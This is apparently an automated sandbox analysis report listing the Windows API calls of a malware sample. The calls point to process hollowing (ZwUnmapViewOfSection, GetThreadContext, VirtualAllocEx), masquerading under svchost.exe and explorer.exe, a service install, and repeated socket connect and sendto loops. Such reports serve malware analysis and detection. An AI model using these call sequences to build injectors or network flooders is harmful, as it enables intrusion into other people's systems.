      • Instruction Fuzzy Hash: E131D6717003417BE710DB65DD45BAB76D8EB88700F00883DB685EB3D1E6B989108B5E
      APIs
      • LoadLibraryA.KERNEL32(Shell32.dll), ref: 00401646
      • GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 00401654
      • FreeLibrary.KERNEL32(00000000), ref: 0040166F
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProc
      • String ID: Shell32.dll$ShellExecuteA$open
      • API String ID: 145871493-1242875128
      • Opcode ID: 2e57850eee62508e1949f66f631c0d0079fe20c14937c4a69f495ebaaf87453f
      • Instruction ID: 18a04fa1837e6b3da508e0e8e43fba5aac3cedb90d2bc1d2a056c299085bb5dc
      • Opcode Fuzzy Hash: 2e57850eee62508e1949f66f631c0d0079fe20c14937c4a69f495ebaaf87453f
      • Instruction Fuzzy Hash: F2D05E306C9310BBE1207F50AD0EFAF2A54DB46B01F120021FA02792D0D6B8280085BE
      APIs
      • CreateFileA.KERNEL32 ref: 00405297
      • GetFileSize.KERNEL32(00000000,00000000,?,00000000), ref: 004052AE
      • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 004052B7
      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?), ref: 004052E2
      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00405304
      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?), ref: 0040530B
        • Part of subcall function 00405330: VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405399
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: File$??2@??3@CloseCreateFreeHandleReadSizeVirtual
      • String ID:
      • API String ID: 3988611374-0
      • Opcode ID: a2863e5673767d964cdede91afb04663b137781032fa7f0b81609b3cc9fc33b2
      • Instruction ID: 221b0b0a4cabf3d12b7df73f085c741e3f61b684f79064255cb0f96ed6264dd2
      • Opcode Fuzzy Hash: a2863e5673767d964cdede91afb04663b137781032fa7f0b81609b3cc9fc33b2
      • Instruction Fuzzy Hash: 111104712546046FE210AB24AC09F3B36DDEBC4764F00073DFE0AA73C0DAB5AD188679
      APIs
      • htons.WS2_32 ref: 004046E4
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000002,00000011), ref: 0040471F
      • sendto.WS2_32(00000000,00408A7C,00000000,00000000,?,00000010), ref: 00404741
      • Sleep.KERNEL32(?), ref: 0040474A
      • closesocket.WS2_32(00000000), ref: 00404750
      • Sleep.KERNEL32(0000001E), ref: 00404758
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleep$closesocketgethostbynamehtonsinet_addrsendtosocket
      • String ID:
      • API String ID: 1054369574-0
      • Opcode ID: 45a6ffd880468f70a481824dd6e3fd1755ad39f1b29a83d52c11540c06d7a3de
      • Instruction ID: bc9cb3a44a504bb613548d5f4e1e64a46e4bff955eaf8bddd84f51c244c6a70d
      • Opcode Fuzzy Hash: 45a6ffd880468f70a481824dd6e3fd1755ad39f1b29a83d52c11540c06d7a3de
      • Instruction Fuzzy Hash: 5D1160716403016BD700EB79AD45F5B77E4EB88710F40883AF645E72A2E774D814CB5D
      APIs
      • htons.WS2_32 ref: 00403CE4
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403D25
      • connect.WS2_32(00000000,?,00000010), ref: 00403D31
      • Sleep.KERNEL32(000001F4), ref: 00403D38
      • closesocket.WS2_32(00000000), ref: 00403D3B
      • Sleep.KERNEL32(?), ref: 00403D47
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleep$closesocketconnectgethostbynamehtonsinet_addrsocket
      • String ID:
      • API String ID: 1787185183-0
      • Opcode ID: 8443317f9dafa97f2392e42f6ccd6fe3450fc2502a4ce46ff6279e13bcdf6a75
      • Instruction ID: c9b9b10d26a8ac24fc8dc46de84298ce88c3985539e8605e2d809d9f5261d823
      • Opcode Fuzzy Hash: 8443317f9dafa97f2392e42f6ccd6fe3450fc2502a4ce46ff6279e13bcdf6a75
      • Instruction Fuzzy Hash: 6511A0716003016BD700EF69DD41B57B7E8EF88710F00883AF545E7262E6B5D9508B6A
      APIs
      • htons.WS2_32 ref: 00403D9B
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403DDB
      • connect.WS2_32(00000000,?,00000010), ref: 00403DE7
      • Sleep.KERNEL32(00000014), ref: 00403DEB
      • Sleep.KERNEL32(00000064), ref: 00403E06
      • closesocket.WS2_32(?), ref: 00403E1C
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleep$closesocketconnectgethostbynamehtonsinet_addrsocket
      • String ID:
      • API String ID: 1787185183-0
      • Opcode ID: edaa330fa2de0a39da5f169561d2b5b36f7fbbd957c4864943f194fb66e7a353
      • Instruction ID: db46a9e34c16731a9cca81507a1d94d98400597ef13b238ba8d557dd9881dec4
      • Opcode Fuzzy Hash: edaa330fa2de0a39da5f169561d2b5b36f7fbbd957c4864943f194fb66e7a353
      • Instruction Fuzzy Hash: 26115B716043419BDB00DF25DD41A5BBBE8AF88704F01092EF585AB291E7B4EA148F9A
      APIs
      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00401B79
      • GetFileSize.KERNEL32(00000000,00000000), ref: 00401B88
      • ??2@YAPAXI@Z.MSVCRT(?,?,00000000), ref: 00401BA2
      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401BB8
      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00401BBF
      • CloseHandle.KERNEL32(00000000), ref: 00401BCC
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: File$CloseHandle$??2@CreateReadSize
      • String ID:
      • API String ID: 2748938236-0
      • Opcode ID: 4316fb04cc77c188b8bcfcaf8f7a8b0344f28b857231df91b7da86c1ee61b739
      • Instruction ID: a0a192e2a767c00397ca819df4e1f58d6aa4c41ca3a1c50c818334c52765ceb6
      • Opcode Fuzzy Hash: 4316fb04cc77c188b8bcfcaf8f7a8b0344f28b857231df91b7da86c1ee61b739
      • Instruction Fuzzy Hash: 7F018171241210BFE320DF249E49F5B36E8EB85B11F110429F705F62C0D774A81586BA
      APIs
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402109
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402116
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402132
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 0040213F
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 0040215B
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402168
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: ServiceStatus
      • String ID:
      • API String ID: 3969395364-0
      • Opcode ID: d1bb2b1bfeb0d321b9b3f541c97aa4a9f6a4e00448e8af0a347742c95850724a
      • Instruction ID: 79b47afaa4391bb2004c4c7ac8aae8e92e9b7ad006814b7af97adc9c59869305
      • Opcode Fuzzy Hash: d1bb2b1bfeb0d321b9b3f541c97aa4a9f6a4e00448e8af0a347742c95850724a
      • Instruction Fuzzy Hash: 86F0FFB2A40159B6CA00EB98BE54F4276B8B7987207118033B204B32E2C5F8BC00CF6C
      APIs
      • CreateProcessA.KERNEL32 ref: 00404F95
      • GetThreadContext.KERNEL32(?,?,?,00000000), ref: 00404FDF
      • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?), ref: 00405001
      • VirtualQueryEx.KERNEL32(?,?,00000000,0000001C), ref: 00405014
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Process$ContextCreateMemoryQueryReadThreadVirtual
      • String ID: D
      • API String ID: 2027120601-2746444292
      • Opcode ID: 3b33d69417f1d5ca419a7b7ada1efc61d5852d100ab3cf01482c54b42626c896
      • Instruction ID: ff5d6133ced2bfcf86262151f3cbec8a07388085264d046bedd301de37389764
      • Opcode Fuzzy Hash: 3b33d69417f1d5ca419a7b7ada1efc61d5852d100ab3cf01482c54b42626c896
      • Instruction Fuzzy Hash: D531F2B5604345AFE314CF58C844E6BB7E8FB89301F10892EFA8997251D770A8058BA2
      APIs
      • LoadLibraryA.KERNEL32(ntdll.dll,?,?,004050FA,?,?,00000000,00000000,00000000), ref: 00404F09
      • GetProcAddress.KERNEL32(00000000,ZwUnmapViewOfSection), ref: 00404F1B
      • FreeLibrary.KERNEL32(00000000), ref: 00404F39
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProc
      • String ID: ZwUnmapViewOfSection$ntdll.dll
      • API String ID: 145871493-452462277
      • Opcode ID: 095f4013b149cb31a46cb3d580cba13eb7930af1090732e97939419024d14a92
      • Instruction ID: efc8a783f345efe3de7d969348ce7e2f5f5aa606f921517c0f9cd98c218141f8
      • Opcode Fuzzy Hash: 095f4013b149cb31a46cb3d580cba13eb7930af1090732e97939419024d14a92
      • Instruction Fuzzy Hash: 11E0927620022157C220A7249D08E2B66A59BC1F513024139F942F3280CA38880682A9
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: printf
      • String ID: relo type %d found at .%X$No fixups!
      • API String ID: 3524737521-288157267
      • Opcode ID: 2a95b7976e450539db6e4a92fc2bb05a3aec52f51334e53e5acddcc7a32b5a7b
      • Instruction ID: 782b23fc7fe4eadffc9be543d9f3ff17d391247f2d2b8b0a52209ba6c093ed9f
      • Opcode Fuzzy Hash: 2a95b7976e450539db6e4a92fc2bb05a3aec52f51334e53e5acddcc7a32b5a7b
      • Instruction Fuzzy Hash: DF31F436A042058FD724EF18C980A6773E5EFC0304F148A7EE88697791D738EA49C799
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405627
      • lstrcat.KERNEL32 ref: 0040563C
      • lstrcpy.KERNEL32(?,?), ref: 00405661
      Strings
      • \Program Files\Internet Explorer\, xrefs: 00405631
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \Program Files\Internet Explorer\
      • API String ID: 2630975639-1791216374
      • Opcode ID: 53e5bf784afc1c7f98d196b5d2c075a3a29870daf7455d8179ced0f2b91ad3c8
      • Instruction ID: bfcf0f80d20a37eb35ee965870948888e4b0ca92358fc844c94cae622ae2a00a
      • Opcode Fuzzy Hash: 53e5bf784afc1c7f98d196b5d2c075a3a29870daf7455d8179ced0f2b91ad3c8
      • Instruction Fuzzy Hash: E9F02BB12441106BD728D71CEC51BEB77D4AFC8700F44043DF6CAE3290D6798558C696
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004053E7
      • lstrcat.KERNEL32 ref: 004053FC
      • lstrcpy.KERNEL32(?,?), ref: 00405421
      Strings
      • \Program Files\Internet Explorer\iexplore.exe, xrefs: 004053F1
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \Program Files\Internet Explorer\iexplore.exe
      • API String ID: 2630975639-1907246925
      • Opcode ID: fe9f5981c5107a24eb4662b232e7904ca7b9376e4c5a8c7cef9e7edc2118fddf
      • Instruction ID: f78577937c66193e5ff90f452aee5a2bd68c8ab3a1555d09418fe11549a69a2a
      • Opcode Fuzzy Hash: fe9f5981c5107a24eb4662b232e7904ca7b9376e4c5a8c7cef9e7edc2118fddf
      • Instruction Fuzzy Hash: 6EF050712441146BD728D71CEC51BDB77E4AFC8700F44043DFACAE3290D6B88558CB96
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405467
      • lstrcat.KERNEL32(?,\svchost.exe), ref: 00405477
      • lstrcpy.KERNEL32(?,?), ref: 0040549C
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \svchost.exe
      • API String ID: 2630975639-2416354339
      • Opcode ID: b05241eece7025ff61889c251bc4ad8f72369c5d8e446100e120ddc31d5d9856
      • Instruction ID: 4611d1f1260c59ae314430bfba731fbd35f7976e4dc38790d624a9758d3b1088
      • Opcode Fuzzy Hash: b05241eece7025ff61889c251bc4ad8f72369c5d8e446100e120ddc31d5d9856
      • Instruction Fuzzy Hash: 8EF059716042106BD738D728EC91BEB77D8AF88700F400439BA8AE32A0D6799494CA86
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004054D7
      • lstrcat.KERNEL32(?,\explorer.exe), ref: 004054E7
      • lstrcpy.KERNEL32(?,?), ref: 0040550C
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \explorer.exe
      • API String ID: 2630975639-1502772786
      • Opcode ID: 823721c289e2eba20add7c8bdeb04609ff25960a1b4460d0f14d2c567736ea70
      • Instruction ID: cf47fa7405b68876a61fa54a680553e6956fd93f1a60e47cd12e063c3e371ca6
      • Opcode Fuzzy Hash: 823721c289e2eba20add7c8bdeb04609ff25960a1b4460d0f14d2c567736ea70
      • Instruction Fuzzy Hash: 09F059712402106BD738D728ED91BEB77D8AFC8700F400439BACAE32A0D6798494CA86
      APIs
      • LoadLibraryA.KERNEL32(00401FFD), ref: 00401006
      • GetProcAddress.KERNEL32(?,DnsFlushResolverCache), ref: 00401018
      • FreeLibrary.KERNEL32(?,?,DnsFlushResolverCache), ref: 00401025
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProc
      • String ID: DnsFlushResolverCache
      • API String ID: 145871493-2186135719
      • Opcode ID: 419f8a2789aa4c9ca289e64ab06dc0e28c4888a4041998e1cad3f1c6f2c1e4c1
      • Instruction ID: 8e5254ed489958740d90822a7c32028ab49060fe15460bb579224531132089e2
      • Opcode Fuzzy Hash: 419f8a2789aa4c9ca289e64ab06dc0e28c4888a4041998e1cad3f1c6f2c1e4c1
      • Instruction Fuzzy Hash: 0ED0A731C4A5A25FD32277306D1879F7BD09F0670030A41B2E842F11E2DB7CC854829E
      APIs
      • LoadLibraryA.KERNEL32(kernel32.dll,0040B273,0040B114,14BEE2C9,0040B0B7,000000AC,487638D3,0040B0C1,487638D3,004048BD,?,00000000,EDC,00000041), ref: 00407212
      • GetProcAddress.KERNEL32(76800000,SetFilePointer), ref: 00407228
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressLibraryLoadProc
      • String ID: SetFilePointer$kernel32.dll
      • API String ID: 2574300362-4212435992
      • Opcode ID: 47063d3ea6f2ae20e95bcafe6dd272a25eee96bbf78a12eefe1d0fbbba9612ce
      • Instruction ID: 92d5dbadcdb673f041f62a2f547e8e2a008e0ea9c6cffdde93753ed389d37c6a
      • Opcode Fuzzy Hash: 47063d3ea6f2ae20e95bcafe6dd272a25eee96bbf78a12eefe1d0fbbba9612ce
      • Instruction Fuzzy Hash: 18D0C9B09882409BD600ABA4EF095063BA5B6063103100475EA06BA3E5D27424568A0E
      APIs
      • GetModuleHandleA.KERNEL32(Kernel32.dll,VirtualAllocEx,00000000,0040205D), ref: 00404C1D
      • GetProcAddress.KERNEL32(00000000), ref: 00404C24
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressHandleModuleProc
